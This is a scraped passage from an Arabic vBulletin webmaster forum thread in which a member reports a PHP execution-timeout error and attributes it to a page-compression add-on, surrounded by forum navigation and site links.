الصريح جداً الصريح جداً غير متصل
عضو
 
تاريخ التسجيل: May 2006
المدينة: جـ JeDDaH ـدة
مشاركة: 2,933
مستوى تقييم العضوية: 0
الصريح جداً is on a distinguished road
وسام الويب الذهبي وسام الويب الفضي وسام الويب البرونزي 
عدد الأوسمة: 3 (المزيد ...)
الافتراضي

الله يعافيك

تشآآآو






التوقيع
كنتُ هنا يوماً ما ...
  #40  
قديم 07-06-2008, 09:59 PM
الصورة الشخصية لـ alromnce
alromnce alromnce غير متصل
عضو
 
تاريخ التسجيل: May 2007
مشاركة: 39
مستوى تقييم العضوية: 0
alromnce is on a distinguished road
Talking

إقتباس:

اقتباس من مشاركة alromnce   مشاهدة المشاركة

   Fatal error: Maximum execution time of 30 seconds exceeded in /home/site/public_html/vb/includes/functions.php(5 166) : eval()'d code on line 65


هلا باأخواني الاعزاء سبب المشكله هي هاك ضغط وتسريع تصفح المنتدى لكن حبيت اتأكد لكن محد اكدلي عليه





موضوع مغلق



خيارات الموضوع
طريقة العرض

قوانين المشاركة
لا يمكنك إضافة موضوع جديد
لا يمكنك الرد على المواضيع
لا يمكنك إضافة مرفقات
لا يمكنك تعديل مشاركاتك

كود vB متاح
كود [IMG] متاح
كود HTML مغلق
إنتقل إلى


جميع الأوقات بتوقيت مكة المكرمة. الساعة الآن » 07:34 AM.

Powered by vBulletin
Copyright ©2000 - 2024, Jelsoft Enterprises Ltd.


 
 »  خدمات البرمجة   »  رئيسية الدليل
  »  خدمات التصميم   »  الأمن والحماية
  »  الدعاية والتسويق
  »  الدعم والتطوير
  »  الشركات الرسمية
  »  حجز دومينات
  »  خدمات الإستضافة
 
 
  »  مكتبة الإستايلات   »  رئيسية المكتبة
  »  أكواد برمجية   »  أدوات الويب ماسترز
  »  مكتبة الهاكات   »  أدوات المصممين
  »  سكربتات متنوعة
  »  مجلات إلكترونية
  »  بلوكات متنوعة
  »  ثيمات مختلفة
 
 

صحيفة متخصصة في متابعة أخبار وجديد الإنترنت العربي
والحوارات الصحفية ومعلومات تقنية متنوعة .

   
 
 

للتواصل مع فريق عمل الويب العربي
يمكنك ذالك من خلال مركز الدعم والمساندة.

 الدعم الفني |  اعتماد العضويات |  قوانين الإنتساب |  إتفاقية الإستخدام |  أهداف الويب العربي |  دليل الشركات |  مكتبة الويب |  صحيفة الويب العربي |  الرئيسية